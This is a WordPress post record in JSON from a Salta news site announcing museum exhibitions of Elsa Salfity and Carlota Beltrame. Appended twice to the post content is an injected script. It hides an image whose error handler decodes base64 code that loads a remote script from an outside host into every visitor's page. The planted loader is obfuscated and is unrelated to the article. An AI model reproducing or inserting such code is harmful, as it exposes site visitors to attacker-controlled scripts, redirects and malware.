{"id":2441,"date":"2023-03-31T17:05:13","date_gmt":"2023-03-31T20:05:13","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2441"},"modified":"2025-08-14T00:20:03","modified_gmt":"2025-08-14T03:20:03","slug":"el-museo-de-bellas-artes-de-salta-inaugura-muestras-de-elsa-salfity-y-carlota-beltrame","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2441","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-museo-de-bellas-artes-de-salta-inaugura-muestras-de-elsa-salfity-y-carlota-beltrame-88784\">El Museo de Bellas Artes de Salta inaugura muestras de Elsa Salfity y Carlota Beltrame<\/a>"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#50081a\"><em>Hoy viernes 31 de marzo, a las 20 horas, el Museo de Bellas Artes dejar\u00e1 inauguradas las muestras \u201cSalfity P\u00fablica\u201d dedicada a Elsa Salfity, y \u201cLugares Comunes\u201d de la artista Carlota Beltrame. Las inauguraciones ser\u00e1n en la sede del Museo (Belgrano 992),.<\/em><\/h4>\n\n\n\n<p><strong>SALFITY P\u00daBLICA<\/strong><\/p>\n\n\n\n<p>En el marco del mes de la Mujer se realiza, en el Museo de Bellas Artes de Salta una muestra dedicada a la figura p\u00fablica de la artista salte\u00f1a Elsa Salfity.<\/p>\n\n\n\n<p>Desde hace algunos a\u00f1os, el Museo de Bellas Artes trabaja en la revalorizaci\u00f3n de artistas mujeres que fueron claves en la construcci\u00f3n de nuestra comunidad art\u00edstica.<\/p>\n\n\n\n<p>Elsa Salfity destaca por su virtuosismo y se desenvuelve con gran facilidad en todas las disciplinas de las artes visuales, esto se hace m\u00e1s evidente a\u00fan en la escultura, con figuras que la identifican y posicionan como la exponente m\u00e1s representativa de la disciplina del siglo XX, realizando importantes aportes al arte local en un \u00e1mbito y \u00e9poca de gran hegemon\u00eda masculina.<\/p>\n\n\n\n<p>SALFITY P\u00daBLICA es una investigaci\u00f3n del equipo del Museo de Bellas Artes que rastrea su vital presencia en nuestras calles y colecciones p\u00fablicas, as\u00ed como su rol fundacional en la Escuela de Bellas Artes de la que fue Directora. Tiene como objetivo acercar a la comunidad la intimidad del proceso de desarrollo de sus obras de car\u00e1cter p\u00fablico, creaci\u00f3n art\u00edstica que seg\u00fan sus propias palabras se basa en \u201cdar riendas sueltas a la imaginaci\u00f3n\u201d.<\/p>\n\n\n\n<p>Con una producci\u00f3n situada siempre en y desde Salta, al margen de los centros art\u00edsticos privilegiados de la Argentina, las obras de Salfity indagan materiales, formas, tem\u00e1ticas y est\u00e9ticas tradicionales y contempor\u00e1neas. El suyo es un trabajo continuo, de permanente indagaci\u00f3n y experimentaci\u00f3n, que parte de un esp\u00edritu \u00fanico que habita, no una cultura sino varias, o al menos dos: la colonial y latina, pero tambi\u00e9n la prehisp\u00e1nica y americana.<\/p>\n\n\n\n<p>Su dedicaci\u00f3n meticulosa, generosa y desinteresa, su conocimiento de los materiales locales como la arcilla y la cer\u00e1mica, y de otros como el bronce, dan cuenta de una labor realizada con compromiso y empe\u00f1o pero tambi\u00e9n con esp\u00edritu, con alma.<\/p>\n\n\n\n<p>Esta muestra invita a la experiencia de un recorrido por sus obras que embellecen los distintos puntos de la ciudad, a trav\u00e9s de im\u00e1genes que esperamos motiven una posterior visita a cada lugar.<\/p>\n\n\n\n<p>Salfity, artista y docente, deja vivo el esp\u00edritu de su obra en las calles de su Salta natal marcando huellas imborrables en el tiempo.<\/p>\n\n\n\n<p>En esta muestra revisitamos la obra de Salfity que se constituye en patrimonio de todos.<\/p>\n\n\n\n<p><strong>LUGARES COMUNES de Carlota Beltrame<\/strong><\/p>\n\n\n\n<p>Carlota Beltrame presenta en esta exposici\u00f3n obras de los \u00faltimos diez a\u00f1os, diversas desde su materialidad, su concepto, sus referencias. Nos habla de la historia, las practicas propias de una comunidad, los lugares comunes, llev\u00e1ndonos a cuestionar las verdades impuestas o construidas socialmente.<\/p>\n\n\n\n<p>Beltrame a trav\u00e9s de este recorrido nos propone reflexionar acerca de nuestra memoria colectiva desde la sensaci\u00f3n f\u00edsica, la experimentaci\u00f3n de los sentidos. La luz, las texturas, el olor, el silencio, el vac\u00edo, lo oculto y no revelado son medios que nos permiten sentir lo material, que atraviese nuestros cuerpos para repensar, para generarnos dudas y preguntas. Abrir puertas.<\/p>\n\n\n\n<p>La luz intensa, claramente dirigida, pone el foco en lo que la artista quiere que veamos, dejando en penumbras todo a su alrededor. Juega con los opuestos: lo develado &#8211; lo oculto, lo que se dice y creemos ciegamente &#8211; lo que se calla. Atrae y perturba a la vez.<\/p>\n\n\n\n<p>Textiles vinculados \u00edntimamente con pr\u00e1cticas ancestrales que no eran valoradas y que hoy se reivindican, permiten a Beltrame utilizarlos como canal para hablar de las mujeres, de las tradiciones, los lugares y tambi\u00e9n de hechos de un pasado cercano, oscuro.<\/p>\n\n\n\n<p>Objetos que nos resultan familiares: baldosas por las que transitamos todos los d\u00edas y elementos dom\u00e9sticos de uso cotidiano; resignificados. A medida que nos conectamos con ellos descubrimos una superposici\u00f3n de mensajes. Capa sobre capa.<\/p>\n\n\n\n<p>La grandeza de las obras de arte reside en que cuestiones anecd\u00f3ticas se vuelven universales. No hablan solo de lo que muestran, si no que nos interpelan. Aqu\u00ed son alegor\u00edas, disparadores para pensar de otra forma, un camino m\u00e1s hacia la verdad.<\/p>\n\n\n\n<p>Beltrame invita a forzar al m\u00e1ximo los sentidos, que no queden en una mera sensaci\u00f3n\/experimentaci\u00f3n, ir un paso m\u00e1s all\u00e1, que los est\u00edmulos sensoriales se transformen en una reflexi\u00f3n profunda sobre nuestra identidad.<\/p>\n\n\n\n<p>Gracia Martinez Arias \u2013 curadora<\/p>\n\n\n\n<p>31 de marzo \u2013 19 hs. Visita guiada con la presencia de la artista<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-museo-de-bellas-artes-de-salta-inaugura-muestras-de-elsa-salfity-y-carlota-beltrame-88784\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Hoy viernes 31 de marzo, a las 20 horas, el Museo de Bellas Artes dejar\u00e1 inauguradas las muestras \u201cSalfity P\u00fablica\u201d dedicada a Elsa Salfity, y \u201cLugares Comunes\u201d de la artista Carlota Beltrame. Las inauguraciones ser\u00e1n en la sede del Museo (Belgrano 992),. SALFITY P\u00daBLICA En el marco del mes de la Mujer se realiza, en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2442,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-2441","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2441"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2441"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2441\/revisions"}],"predecessor-version":[{"id":7129,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2441\/revisions\/7129"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2442"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2441"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2441"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2441"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}